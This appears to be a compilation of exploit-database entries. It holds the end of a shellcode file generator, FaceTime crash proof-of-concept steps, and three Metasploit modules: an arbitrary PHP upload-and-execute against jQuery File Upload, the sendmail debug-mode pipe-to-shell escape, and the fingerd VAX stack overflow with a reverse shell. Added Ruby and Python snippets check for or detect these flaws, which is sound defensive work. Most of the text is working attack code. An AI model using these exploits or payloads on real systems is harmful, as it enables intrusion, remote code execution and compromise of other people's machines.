buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a"
buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57"
buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36"
buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34"
buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f"
buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b"
buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e"
buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67"
buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72"
buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c"
buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f"
buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b"
buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41"
buf += "\x41"

# venetian padding

ven = "\x53"            #push esi
ven += "\x43"           #align
ven += "\x58"           #pop eax
ven += "\x43"           #align
ven += "\x05\x50\x11"   #add eax,11005000
ven += "\x43"           #align
ven += "\x2d\x1c\x11"   #sub eax,11001c00
ven += "\x43"           #align
ven += "\x48"           #dec eax
ven += "\x43"           #align
ven += "\x43"*2         #nops

payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf))

try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
            
There are a variety of problems that occur when processing malformed H264 streams in readSPSandGetDecoderParams, leading to OOB read, OOB write and stack_chk crashes. I think the root cause is stack corruption. This issue can occur if someone accepts a malicious FaceTime call.

To reproduce the issue:

On the target device:

1) build no-encrypt.c (gcc -dynamiclib -o mylib)
2) copy the file to /usr/lib/mylib
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)

This will strip encryption to allow the target to receive unencrypted packets. It is also possible to repro this issue using the method described in issue 1634, but it is much more reliable and debuggable with the unencrypted packets.

On the host device:

    1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
    2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
    3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
    4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
    5) Restart the machine
    6) Extract the attached sc.zip to /out and change the permissions so it's readable by AVConference
    7) Call target, when they pick up, AVConference will crash

When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45787.zip
            
There is a heap corruption vulnerability in VCPDecompressionDecodeFrame which is called by FaceTime. This bug can be reached if a user accepts a call from a malicious peer.

The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:

    1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
    2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
    3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
    4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
    5) Restart the machine
    6) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
    7) Call target, when they pick up, AVConference will crash

When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.

* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
    frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing:
->  0x7fff6bd71892 <+4492>: movl   (%rcx,%rbx), %r8d
    0x7fff6bd71896 <+4496>: bswapl %r8d
    0x7fff6bd71899 <+4499>: movl   %eax, %ecx
    0x7fff6bd7189b <+4501>: shll   %cl, %r8d
Target 0: (avconferenced) stopped.
(lldb) bt
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
  * frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
    frame #1: 0x00007fff6bd976b6 VideoProcessing`___lldb_unnamed_symbol3007$$VideoProcessing + 117
    frame #2: 0x00007fff6bda4eb9 VideoProcessing`___lldb_unnamed_symbol3043$$VideoProcessing + 513
    frame #3: 0x00007fff6bda4b76 VideoProcessing`___lldb_unnamed_symbol3042$$VideoProcessing + 560
    frame #4: 0x00007fff6bd6b252 VideoProcessing`___lldb_unnamed_symbol2741$$VideoProcessing + 4206
    frame #5: 0x00007fff53cf67f4 VideoToolbox`___lldb_unnamed_symbol79$$VideoToolbox + 1233
    frame #6: 0x00007fff53cf5373 VideoToolbox`___lldb_unnamed_symbol59$$VideoToolbox + 401
    frame #7: 0x00007fff6bca7381 VideoProcessing`VCPDecompressionSessionDecodeFrame + 423
    frame #8: 0x000000010bb86bab AVConference`VideoPlayer_ShowFrame + 1384
    frame #9: 0x000000010bb8cf98 AVConference`VideoReceiver_ShowFrame + 740
    frame #10: 0x000000010bb8c5be AVConference`VideoReceiver_VideoAlarm + 720
    frame #11: 0x000000010bb78933 AVConference`SoundPlayer_AlarmThread + 364
    frame #12: 0x00007fff484fe98b CoreMedia`figThreadMain + 277
    frame #13: 0x00007fff6f6a6661 libsystem_pthread.dylib`_pthread_body + 340
    frame #14: 0x00007fff6f6a650d libsystem_pthread.dylib`_pthread_start + 377
    frame #15: 0x00007fff6f6a5bf9 libsystem_pthread.dylib`thread_start + 13

I've improved the PoC a lot for this, an updated video-replay.c is attached.  This version does not require the binary patch for the sender binary, other than adding the library with insert_dylib. So to use this one:

1) Build video-replay.c attached (g++ -std=c++11 -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
6) Call target with FaceTime, when they pick up, AVConference will crash


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45788.zip
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "blueimp's jQuery (Arbitrary) File Upload",
      'Description'    => %q{
        This module exploits an arbitrary file upload in the sample PHP upload
        handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.

        Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
        file may be disabled, enabling exploitation of this vulnerability.

        This vulnerability has been exploited in the wild since at least 2015
        and was publicly disclosed to the vendor in 2018. It has been present
        since the .htaccess change in Apache 2.3.9.

        This module provides a generic exploit against the jQuery widget.
      },
      'Author'         => [
        'Claudio Viviani',     # WordPress Work the Flow (Arbitrary) File Upload
        'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
        'wvu'                  # Metasploit module
      ],
      'References'     => [
        ['CVE', '2018-9206'],
        ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
        ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
        ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
        ['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
        ['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
      ],
      'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
      'License'        => MSF_LICENSE,
      'Platform'       => ['php', 'linux'],
      'Arch'           => [ARCH_PHP, ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
        ['PHP Dropper',   'Platform' => 'php',   'Arch' => ARCH_PHP],
        ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
    ])
  end

  def version_paths
    %w[
      /package.json
      /bower.json
    ].map { |u| normalize_uri(target_uri.path, u) }
  end

  # List from PoC sorted by frequency
  def upload_paths
    %w[
      /server/php/index.php
      /server/php/upload.class.php
      /server/php/UploadHandler.php
      /example/upload.php
      /php/index.php
    ].map { |u| normalize_uri(target_uri.path, u) }
  end

  def check
    a = nil

    version_paths.each do |u|
      vprint_status("Checking #{u}")

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => u
      )

      next unless res

      unless a
        res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
          $1 && (a = Gem::Version.new($1))

        if a && a >= Gem::Version.new('2.3.9')
          vprint_good("Found Apache #{a} (AllowOverride None may be set)")
        elsif a
          vprint_warning("Found Apache #{a} (AllowOverride All may be set)")
        end
      end

      next unless res.code == 200 && (j = res.get_json_document) &&
                  j['version'] && (v = Gem::Version.new(j['version']))

      if v <= Gem::Version.new('9.22.0')
        vprint_good("Found unpatched jQuery File Upload #{v}")
        return CheckCode::Appears
      else
        vprint_error("Found patched jQuery File Upload #{v}")
        return CheckCode::Safe
      end
    end

    CheckCode::Unknown
  end

  def find_upload
    upload_paths.each do |u|
      vprint_status("Checking #{u}")

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => u
      )

      if res && res.code == 200
        vprint_good("Found #{u}")
        return u
      end
    end

    nil
  end

  def exploit
    unless check == CheckCode::Appears && (u = find_upload)
      fail_with(Failure::NotFound, 'Could not find target')
    end

    f = "#{rand_text_alphanumeric(8..42)}.php"
    p = normalize_uri(File.dirname(u), 'files', f)

    print_status('Uploading payload')
    res = upload_payload(u, f)

    unless res && res.code == 200 && res.body.include?(f)
      fail_with(Failure::NotVulnerable, 'Could not upload payload')
    end

    print_good("Payload uploaded: #{full_uri(p)}")

    print_status('Executing payload')
    exec_payload(p)

    print_status('Deleting payload')
    delete_payload(u, f)
  end

  def upload_payload(u, f)
    p = get_write_exec_payload(unlink_self: true)

    m = Rex::MIME::Message.new
    m.add_part(p, nil, nil, %(form-data; name="files[]"; filename="#{f}"))

    send_request_cgi(
      'method' => 'POST',
      'uri'    => u,
      'ctype'  => "multipart/form-data; boundary=#{m.bound}",
      'data'   => m.to_s
    )
  end

  def exec_payload(p)
    send_request_cgi({
      'method' => 'GET',
      'uri'    => p
    }, 1)
  end

  def delete_payload(u, f)
    send_request_cgi(
      'method'   => 'DELETE',
      'uri'      => u,
      'vars_get' => {'file' => f}
    )
  end

end
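
The module description ties exposure to the `AllowOverride` default that changed in Apache 2.3.9, which decides whether the widget's `.htaccess` is read at all. This added example (not part of the Metasploit module or of blueimp's code) works out the effective `AllowOverride` for the upload directory from a `Server` header and a configuration file. The document root `/var/www/html` and both sample configurations are constructed, and only plain `<Directory>` sections are handled.

```python
import re

# TARGETURI default and files/ location are taken from the module; the document root is assumed.
UPLOAD_DIR = "/var/www/html/jQuery-File-Upload/server/php/files"

# Constructed: no AllowOverride anywhere, so the version default applies.
STOCK_CONFIG = """\
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    Require all granted
</Directory>
"""

# Constructed: overrides disabled globally, re-enabled for the widget only.
OVERRIDE_CONFIG = """\
<Directory />
    AllowOverride None
</Directory>
# Re-enable .htaccess for the widget
<Directory "/var/www/html/jQuery-File-Upload">
    AllowOverride All
</Directory>
"""

_OPEN = re.compile(r'<Directory\s+"?([^">]+)"?\s*>', re.IGNORECASE)


def default_allow_override(server_header):
    """Default AllowOverride for the Apache version named in a Server header."""
    match = re.search(r"Apache/(\d+(?:\.\d+)*)", server_header)
    if not match:
        return None
    version = tuple(int(part) for part in match.group(1).split("."))
    # The default changed from All to None in 2.3.9.
    return "None" if version >= (2, 3, 9) else "All"


def effective_allow_override(config, directory, server_header):
    """AllowOverride in force for `directory`: the longest matching section wins."""
    value, best = default_allow_override(server_header), -1
    section = None
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opened = _OPEN.fullmatch(line)
        if opened:
            section = opened.group(1).strip().rstrip("/") or "/"
            continue
        if line.lower().startswith("</directory"):
            section = None
            continue
        words = line.split()
        if section and len(words) > 1 and words[0].lower() == "allowoverride":
            covers = (section == "/" or directory == section
                      or directory.startswith(section + "/"))
            if covers and len(section) >= best:
                value, best = " ".join(words[1:]), len(section)
    return value


def htaccess_ignored(config, directory, server_header):
    """True when Apache would not read .htaccess files under `directory`."""
    value = effective_allow_override(config, directory, server_header)
    return value is not None and value.lower() == "none"


if __name__ == "__main__":
    for header in ("Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30", "Apache/2.2.22 (Ubuntu)"):
        print(header, "->", effective_allow_override(STOCK_CONFIG, UPLOAD_DIR, header))
```
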
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Remote

  # cmd/unix/reverse spams the session with Telnet codes on EOF
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Morris Worm sendmail Debug Mode Shell Escape',
      'Description'    => %q{
        This module exploits sendmail's well-known historical debug mode to
        escape to a shell and execute commands in the SMTP RCPT TO command.

        This vulnerability was exploited by the Morris worm in 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

        Currently only cmd/unix/reverse and cmd/unix/generic are supported.
      },
      'Author'         => [
        'Robert Tappan Morris', # Exploit and worm for sure
        'Cliff Stoll',          # The Cuckoo's Egg inspiration
        'wvu'                   # Module and additional research
      ],
      'References'     => [
        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
      ],
      'DisclosureDate' => 'Nov 2 1988',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false, # DefUid in src/conf.c, usually "daemon"
      'Payload'        => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
      'Targets'        => [
        # https://en.wikipedia.org/wiki/Source_Code_Control_System
        ['@(#)version.c       5.51 (Berkeley) 5/2/86', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
    ))

    register_options([Opt::RPORT(25)])

    register_advanced_options([
      OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
    ])
  end

  def check
    checkcode = CheckCode::Safe

    connect
    res = sock.get_once

    return CheckCode::Unknown unless res

    if res =~ /^220.*Sendmail/
      checkcode = CheckCode::Detected
    end

    sock.put("DEBUG\r\n")
    res = sock.get_once

    return checkcode unless res

    if res.start_with?('200 Debug set')
      checkcode = CheckCode::Appears
    end

    checkcode
  rescue Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    # We don't care who the user is, so randomize it
    from = rand_text_alphanumeric(8..42)

    # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
    to = %("| sed '1,/^$/d' | sh; exit 0")

    # We don't have $PATH, so set one
    path = '/bin:/usr/bin:/usr/ucb:/etc'

    sploit = {
      nil                   => /220.*Sendmail/,
      'DEBUG'               => /200 Debug set/,
      "MAIL FROM:<#{from}>" => /250.*Sender ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail/,
      # Indent PATH= so it's not interpreted as part of the mail header
      " PATH=#{path}"       => nil,
      'export PATH'         => nil,
      payload.encoded       => nil,
      '.'                   => /250 Ok/,
      'QUIT'                => /221.*closing connection/
    }

    print_status('Connecting to sendmail')
    connect

    print_status('Enabling debug mode and sending exploit')
    sploit.each do |line, pattern|
      Timeout.timeout(datastore['SendExpectTimeout']) do
        if line
          print_status("Sending: #{line}")
          sock.put("#{line}\r\n")
        end
        if pattern
          vprint_status("Expecting: #{pattern.inspect}")
          sock.expect(pattern) do |pat|
            return unless pat
            vprint_good("Received: #{pat.first}")
          end
        end
      end
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error
    fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
  ensure
    disconnect
  end

  def on_new_session(session)
    print_warning("Do NOT type `exit', or else you may lose further shells!")
    print_warning('Hit ^C to abort the session instead, please and thank you')
  end

end
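
The detection counterpart to the exchange this module drives, as an added example that is not part of the Metasploit module or the original post. It separates attempts from server-accepted steps and ignores command-like text inside a message body. The `C: `/`S: ` transcript format, the function name and the sample session are assumptions constructed for illustration.

```ruby
# Added example: classify a captured SMTP exchange for the debug-mode pattern.
# Assumed input format: one protocol line per row, prefixed "C: " or "S: ".
PIPE_RCPT = /\ARCPT\s+TO:\s*<?\s*"?\s*\|/i

def scan_smtp_transcript(transcript)
  findings = []
  in_data = false
  pending = nil # client command still waiting for the server's reply

  transcript.each_line.with_index(1) do |raw, n|
    dir, text = raw.chomp.split(': ', 2)
    next if text.nil?
    if dir == 'S'
      code = text[0, 3]
      findings << [n, :debug_accepted] if pending == :debug && code == '200'
      findings << [n, :pipe_recipient_accepted] if pending == :pipe && code == '250'
      in_data = true if pending == :data && code == '354'
      pending = nil
    elsif in_data
      in_data = false if text == '.' # message body is never parsed as commands
    elsif text =~ /\ADEBUG\b/i
      findings << [n, :debug_attempt]
      pending = :debug
    elsif text =~ PIPE_RCPT
      findings << [n, :pipe_recipient_attempt]
      pending = :pipe
    elsif text =~ /\ADATA\s*\z/i
      pending = :data
    end
  end
  findings
end

# Constructed sample: the exchange from the module above with a harmless body.
SAMPLE = <<~'EOS'
  S: 220 host Sendmail 5.51 ready
  C: DEBUG
  S: 200 Debug set
  C: MAIL FROM:<abc>
  S: 250 <abc>... Sender ok
  C: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
  S: 250 <"| sed '1,/^$/d' | sh; exit 0">... Recipient ok
  C: DATA
  S: 354 Enter mail
  C: echo constructed-sample
  C: .
  S: 250 Ok
EOS
scan_smtp_transcript(SAMPLE).each { |n, rule| puts "line #{n}: #{rule}" }
```

A `debug_attempt` with no matching `debug_accepted` indicates a probe against a server that refused the command; the two `*_accepted` findings together indicate the recipient was handed to a shell.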
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  # This is so one-off that we define it here
  ARCH_VAX = 'vax'

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'              => 'Morris Worm fingerd Stack Buffer Overflow',
      'Description'       => %q{
        This module exploits a stack buffer overflow in fingerd on 4.3BSD.
        This vulnerability was exploited by the Morris worm on 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
      },
      'Author'            => [
        'Robert Tappan Morris', # Discovery? Exploit and worm for sure
        'Cliff Stoll',          # The Cuckoo's Egg epilogue and inspiration
        'wvu'                   # Module, payload, and additional research
      ],
      'References'        => [
        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
        ['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'],   # Details
        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
        # And credit to the innumerable VAX ISA docs on the Web
      ],
      'DisclosureDate'    => 'Nov 2 1988',
      'License'           => MSF_LICENSE,
      'Platform'          => 'bsd',
      'Arch'              => ARCH_VAX,
      'Privileged'        => false, # Depends on inetd.conf, usually "nobody"
      'Targets'           => [
        # https://en.wikipedia.org/wiki/Source_Code_Control_System
        ['@(#)fingerd.c   5.1 (Berkeley) 6/6/85',
          'Ret'           => 0x7fffe9b0,
          'Payload'       => {
            'Space'       => 403,
            'BadChars'    => "\n",
            'Encoder'     => 'generic/none', # There is no spoon
            'DisableNops' => true            # Hardcoded NOPs
          }
        ]
      ],
      'DefaultTarget'     => 0,
      'DefaultOptions'    => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
    ))

    register_options([Opt::RPORT(79)])
  end

  def check
    token = rand_text_alphanumeric(8..42)

    connect
    sock.put("#{token}\n")
    res = sock.get_once

    return CheckCode::Unknown unless res

    if res.include?("Login name: #{token}")
      return CheckCode::Detected
    end

    CheckCode::Safe
  rescue Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    # Start by generating our custom VAX shellcode
    shellcode = payload.encoded

    # 0x01 is NOP in VAX-speak
    nops = "\x01" * (target.payload_space - shellcode.length)

    # This overwrites part of the buffer
    junk = rand_text_alphanumeric(109)

    # This zeroes out part of the stack frame
    frame = "\x00" * 16

    # Finally, pack in our return address
    ret  = [target.ret].pack('V') # V is for VAX!

    # The newline is for gets(3)
    sploit = nops + shellcode + junk + frame + ret + "\n"

    # Fire away
    print_status('Connecting to fingerd')
    connect
    print_status("Sending #{sploit.length}-byte buffer")
    sock.put(sploit)

  # Hat tip @bcoles
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  ensure
    disconnect
  end

end
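
The defensive side of the overflow above, as an added example that is not part of the Metasploit module or the original post: a bounded request reader in place of an unbounded line read, plus a triage helper for a captured oversized request. The function names, the constants' names and the sample capture are assumptions constructed for illustration; the sizes are taken from the module's buffer layout.

```ruby
require 'stringio'

# Added example. Sizes come from the module's layout: 403 + 109 = 512 buffer
# bytes, then 16 frame bytes, then a 4-byte little-endian value.
FINGER_BUF = 512
FRAME_PAD  = 16

# Bounded replacement for an unbounded line read: at most `limit` bytes.
def read_finger_request(io, limit = FINGER_BUF)
  line = io.gets("\n", limit)
  return [:rejected, 'empty request'] if line.nil?
  unless line.end_with?("\n")
    reason = line.bytesize >= limit ? 'line exceeds buffer' : 'no line terminator'
    return [:rejected, reason]
  end
  query = line.chomp
  return [:rejected, 'non-printable bytes'] unless query.bytes.all? { |b| b.between?(0x20, 0x7e) }
  [:ok, query]
end

# Triage a captured request: how far past the buffer it runs and which value
# lands where the module places its return address.
def triage_finger_capture(bytes)
  body = bytes.b.delete_suffix("\n")
  slot = body.byteslice(FINGER_BUF + FRAME_PAD, 4)
  {
    overflow: [body.bytesize - FINGER_BUF, 0].max,
    control_value: slot && slot.bytesize == 4 ? slot.unpack1('V') : nil,
    non_printable: body.bytes.count { |b| !b.between?(0x20, 0x7e) }
  }
end

# Constructed capture: inert filler, zeroed frame, marker value 0x41424344.
CAPTURE = ('A' * FINGER_BUF + "\x00" * FRAME_PAD + [0x41424344].pack('V') + "\n").b
```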